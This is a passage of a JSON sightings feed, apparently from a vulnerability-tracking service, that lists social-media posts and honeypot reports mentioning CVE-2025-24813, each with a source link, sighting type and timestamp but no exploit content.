"https://poliverso.org/objects/0477a01e-5d8a787e-0a46d2819f02fc70", "content": "", "creation_timestamp": "2025-03-18T09:19:45.952029Z"}, {"uuid": "f0cb48ca-e0a9-483b-9518-afce25487166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lk655hq6662q", "content": "", "creation_timestamp": "2025-03-12T08:13:14.323618Z"}, {"uuid": "bcd0d309-6014-481c-9757-39b0b42d4258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/catc0n/statuses/114189217690725779", "content": "", "creation_timestamp": "2025-03-19T12:59:46.421658Z"}, {"uuid": "caee3fe5-302d-4725-a692-66d29fdb8ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/chrisshort.net/post/3lktaeihrlv2m", "content": "", "creation_timestamp": "2025-03-20T17:36:45.869904Z"}, {"uuid": "abe989a4-7a42-4c8c-8c18-95c11c53e245", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lkfwfe3oxc2x", "content": "", "creation_timestamp": "2025-03-15T10:33:41.208249Z"}, {"uuid": "307100c0-1850-48eb-8b50-5596497cc87b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/114195969189490845", "content": "", "creation_timestamp": "2025-03-20T17:36:46.447316Z"}, {"uuid": "c65ce7f2-3406-42af-9ce0-f3373fbc4735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lkomemcicw2k", "content": "", "creation_timestamp": "2025-03-18T21:28:16.056099Z"}, {"uuid": "e2e0a402-e4b0-4683-8344-1e3a0b3c0acd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buzzleaktv.bsky.social/post/3ll53okymab2n", "content": "", "creation_timestamp": "2025-03-24T15:39:33.594064Z"}, {"uuid": "21ed1a53-1a67-4bbf-8195-038a6236aec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll6musnsxh22", "content": "", "creation_timestamp": "2025-03-25T06:20:09.126302Z"}, {"uuid": "05591c02-f591-430d-b19d-b3809618970d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lktd6oyve7h2", "content": "", "creation_timestamp": "2025-03-20T18:28:27.920530Z"}, {"uuid": "1c7651cb-35c8-4f92-962f-50a4346162c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4dcyph2fn2", "content": "", "creation_timestamp": "2025-03-24T08:28:19.242266Z"}, {"uuid": "d4987f16-4a1f-45f6-bf31-ca3bb99e239f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/greynoise.infosec.exchange.ap.brid.gy/post/3lktgndrsium2", "content": "", "creation_timestamp": "2025-03-20T19:29:41.960247Z"}, {"uuid": "7543e4c7-d94a-47b2-b055-e2069b122b60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lkfy6qjt5kz2", "content": "", "creation_timestamp": "2025-03-15T11:07:50.010767Z"}, {"uuid": "b352400f-a300-4790-bb2b-df4925523062", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lkg2tnetdiz2", "content": "", "creation_timestamp": "2025-03-15T11:53:18.011605Z"}, {"uuid": "fd6791d9-c048-474e-bdcd-ada8ece286eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lk454cteps2i", "content": "", "creation_timestamp": "2025-03-11T13:07:18.339853Z"}, {"uuid": "638017c0-15f5-4603-8857-5858e4ca2869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://ioc.exchange/users/83r71n/statuses/114143544837442707", "content": "", "creation_timestamp": "2025-03-11T11:24:35.572435Z"}, {"uuid": "e4dabc01-9510-4788-b1ae-9c565c2a9d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securestep9.bsky.social/post/3lkn7offb5f26", "content": "", "creation_timestamp": "2025-03-18T08:08:26.465364Z"}, {"uuid": "12f2da7b-eb71-4d49-911c-5bd95ec57fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4zkfymito2", "content": "", "creation_timestamp": "2025-03-24T15:03:04.711899Z"}, {"uuid": "0f739a99-e78a-4b4a-9940-3ac03e7262e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/mbissey.bsky.social/post/3lknctozbsd2b", "content": "", "creation_timestamp": "2025-03-18T09:05:05.369657Z"}, {"uuid": "cfcb37a4-18b5-4119-ab34-5f1d3ec3aef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/greynoise.io/post/3lktgrp3mjk2e", "content": "", "creation_timestamp": "2025-03-20T19:31:32.861011Z"}, {"uuid": "49a4d748-38e6-4081-a743-23720c239d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll57ozb7rq72", "content": "", "creation_timestamp": "2025-03-24T16:51:33.975362Z"}, {"uuid": "4031fb44-866c-4ea1-ab0c-7ba8346a42ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lkgcdqlgal23", "content": "", "creation_timestamp": "2025-03-15T14:07:32.037176Z"}, {"uuid": "3a9b9cd3-a734-4ce0-b06e-8adacea97589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3lk6dngxxe22n", "content": "", "creation_timestamp": "2025-03-12T10:09:32.812390Z"}, {"uuid": "b1b98189-07db-4174-bf60-f2ea3eab842a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "4fbfbadc-30ea-4bf2-b115-4e0cc1f0bbe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bishopfox.bsky.social/post/3lkqjuefasc2r", "content": "", "creation_timestamp": "2025-03-19T15:48:44.750711Z"}, {"uuid": "51601617-c24c-4402-b6a2-288e85a23102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lkl4prgoyf2z", "content": "", "creation_timestamp": "2025-03-17T12:10:11.739319Z"}, {"uuid": "49c37ec6-24c0-409b-a799-8bf07c84f0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/greynoise/statuses/114196410544132850", "content": "", "creation_timestamp": "2025-03-20T19:29:01.902291Z"}, {"uuid": "60beee73-dd3d-4f16-a8af-95f38da633ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkdvhyveg22z", "content": "", "creation_timestamp": "2025-03-14T15:12:01.504200Z"}, {"uuid": "2d430fc7-9c34-4663-b7f7-c3046a4d9eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/rapid7.com/post/3lkqr5pidgs2p", "content": "", "creation_timestamp": "2025-03-19T17:59:15.079307Z"}, {"uuid": "fbfbda36-3e9f-4cf6-a20a-345bfc98c3c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/netmarkjp.bsky.social/post/3lkoxy3dimj2u", "content": "", "creation_timestamp": "2025-03-19T00:56:00.299952Z"}, {"uuid": "fad6798a-0c10-4c37-8af2-55620aef4f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bleepingcomputer.com/post/3lklb5harvz2v", "content": "", "creation_timestamp": "2025-03-17T13:29:25.304322Z"}, {"uuid": "7b7f8c25-2a87-4615-a33f-796370cf392d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3ll5abc5rjs23", "content": "", "creation_timestamp": "2025-03-24T17:01:36.066839Z"}, {"uuid": "3914bc90-e78c-4160-a3e0-357b9604dea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114178045232050618", "content": "", "creation_timestamp": "2025-03-17T13:38:28.384356Z"}, {"uuid": "fd861e51-3954-414d-87e7-1d693f8f1ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3ll576k7rd72w", "content": "", "creation_timestamp": "2025-03-24T16:42:10.225837Z"}, {"uuid": "fdd69280-6ae1-4416-9a91-9134126dc53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "7938538a-7e68-46f4-8d55-ca164f0a8ee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lkuyr3k3q22v", "content": "", "creation_timestamp": "2025-03-21T10:26:01.472138Z"}, {"uuid": "9831519b-83a6-4dbb-9eb3-444935629793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk252mlvak22", "content": "", "creation_timestamp": "2025-03-10T18:00:59.989007Z"}, {"uuid": "720a5a0b-5fec-4cb5-bec1-52652a51d703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114194414306800739", "content": "", "creation_timestamp": "2025-03-20T11:01:20.424359Z"}, {"uuid": "6cd9b16c-cf64-47bf-b47c-9368f242d288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://threatintel.cc/2025/03/14/one-put-request-to-own.html", "content": "", "creation_timestamp": "2025-03-14T10:04:25.000000Z"}, {"uuid": "2ce36026-7f30-4d94-b7bd-dd735eae4ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkxleuja7k2z", "content": "", "creation_timestamp": "2025-03-22T11:04:31.046797Z"}, {"uuid": "6c160b33-d45d-442d-b748-f43c7bbf3f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkxlfdsekk2z", "content": "", "creation_timestamp": "2025-03-22T11:04:47.840629Z"}, {"uuid": "69de62c5-cef3-44ff-8773-8be7d65dac13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lk22hs7zke24", "content": "", "creation_timestamp": "2025-03-10T17:14:40.637284Z"}, {"uuid": "35355bf7-da6f-47a3-9774-4e96170396ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/GossiTheDog.cyberplace.social.ap.brid.gy/post/3lkquvbcpvwl2", "content": "", "creation_timestamp": "2025-03-19T19:06:14.271914Z"}, {"uuid": "aa352358-6ec2-45aa-a5ad-55c8589b6e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/114190657188083494", "content": "", "creation_timestamp": "2025-03-19T19:06:16.562566Z"}, {"uuid": "e8972f27-d906-493d-a11a-f6a27d09a996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk2475qby42e", "content": "", "creation_timestamp": "2025-03-10T17:45:38.340029Z"}, {"uuid": "b1900d86-2b2f-463f-8e77-d6e37526206d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114139387486690862", "content": "", "creation_timestamp": "2025-03-10T17:47:18.059361Z"}, {"uuid": "1f72649f-7dc2-4bd4-8d71-c04da71a824e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3lkv7554iyg2a", "content": "", "creation_timestamp": "2025-03-21T12:20:05.168891Z"}, {"uuid": "50984e6b-a938-471e-b8fa-423716cb1292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3llsgwopo522e", "content": "", "creation_timestamp": "2025-04-02T03:26:53.959803Z"}, {"uuid": "03fb11b8-948b-461f-95a2-4becd22de47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lk2cvzrrmf2m", "content": "", "creation_timestamp": "2025-03-10T19:45:49.381190Z"}, {"uuid": "67b3145c-eee2-49c3-9fc8-632f8976a0ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lknowexltc2x", "content": "", "creation_timestamp": "2025-03-18T12:41:19.984330Z"}, {"uuid": "12759965-de6a-4556-8804-3cc75f53d718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3ll25gfuaxc2x", "content": "", "creation_timestamp": "2025-03-23T11:32:47.471845Z"}, {"uuid": "9bf4f453-211c-420e-9555-eb6a0a4e2e10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3lkpi2bzw5u2g", "content": "", "creation_timestamp": "2025-03-19T05:43:34.480410Z"}, {"uuid": "740c1094-e322-40d8-9714-936b794ab7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3llgy3cyxii2m", "content": "", "creation_timestamp": "2025-03-28T14:01:43.088666Z"}, {"uuid": "0ed76267-e9dd-4ab6-8dfb-0cd992da984d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk6p6tng3225", "content": "", "creation_timestamp": "2025-03-12T13:36:08.896380Z"}, {"uuid": "9d572ef3-cc18-41e5-8297-0ba7201e9369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://mstdn.ca/users/rfwaveio/statuses/114183601892991846", "content": "", "creation_timestamp": "2025-03-18T13:11:41.346652Z"}, {"uuid": "152f0ced-e1b9-4dce-84a4-a252a9396d37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264205037040699", "content": "", "creation_timestamp": "2025-04-01T18:50:02.911719Z"}, {"uuid": "ee668561-4f6e-40b4-892e-3cb04a2ec908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/lordman1982.bsky.social/post/3lkv62ud5dt2f", "content": "", "creation_timestamp": "2025-03-21T12:00:55.630653Z"}, {"uuid": "189ed584-ae19-4f3b-ab24-c24288856de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llsoznh4us2h", "content": "", "creation_timestamp": "2025-04-02T05:51:40.253533Z"}, {"uuid": "3ad13047-5574-44ca-badc-5fb2e41d9f7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3llrq3mcnpg2b", "content": "", "creation_timestamp": "2025-04-01T20:37:59.733459Z"}, {"uuid": "c62da3a4-f516-48c8-997c-84a7226d6311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264205037040699", "content": "", "creation_timestamp": "2025-04-01T18:50:02.915890Z"}, {"uuid": "02875eff-2404-4155-abbc-082be253220d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lljp6bprsc2m", "content": "", "creation_timestamp": "2025-03-29T16:00:20.040407Z"}, {"uuid": "c7490246-7f6a-4fba-8189-c8d42f334295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3llrmisaosk2g", "content": "", "creation_timestamp": "2025-04-01T19:33:47.660234Z"}, {"uuid": "b58c8900-dd29-4896-9bf0-b6943cb20b01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3llkq3fw2rk2b", "content": "", "creation_timestamp": "2025-03-30T01:49:16.838471Z"}, {"uuid": "3682aa9e-b1c4-4809-a60e-1a2743fda8c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/3702835", "content": "", "creation_timestamp": "2025-04-01T21:15:12.703588Z"}, {"uuid": "7dbad172-56dc-41a0-9f8e-209b7279bf51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114268459075525163", "content": "", "creation_timestamp": "2025-04-02T12:51:54.437904Z"}, {"uuid": "d4ca329d-1ec5-4311-bcf6-59d9ccc14aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114268459075525163", "content": "", "creation_timestamp": "2025-04-02T12:51:54.447112Z"}, {"uuid": "4f38cff2-4f6b-4489-8821-da0d082747cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwp4g6y4e2x", "content": "", "creation_timestamp": "2025-04-03T20:03:52.220309Z"}, {"uuid": "1d64ad60-f8cf-4e0f-860b-5bc64eca09af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llubw2vikt2i", "content": "", "creation_timestamp": "2025-04-02T21:02:22.082681Z"}, {"uuid": "a6e2c7b8-3d7a-4d87-ab2d-463f11c5cf59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lluei5bhs22a", "content": "", "creation_timestamp": "2025-04-02T21:48:15.544266Z"}, {"uuid": "cd54f2fa-0f1e-4a36-9788-b75dc873ee5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llutdd7rme2r", "content": "", "creation_timestamp": "2025-04-03T02:13:59.495506Z"}, {"uuid": "a06562c5-afca-4136-aae3-e3fa6b3275e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/3702835", "content": "", "creation_timestamp": "2025-04-01T21:15:12.710846Z"}, {"uuid": "48edb260-b575-4059-ae60-51b7d6a8051f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3llsyaqnq5c2v", "content": "", "creation_timestamp": "2025-04-02T08:36:45.993057Z"}, {"uuid": "01975166-99c0-46bf-8a00-1f74e39bcf1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3llrjs754642a", "content": "", "creation_timestamp": "2025-04-01T18:45:21.571180Z"}, {"uuid": "2c511da0-6ec5-46ff-a95a-0d9c13c1f869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": 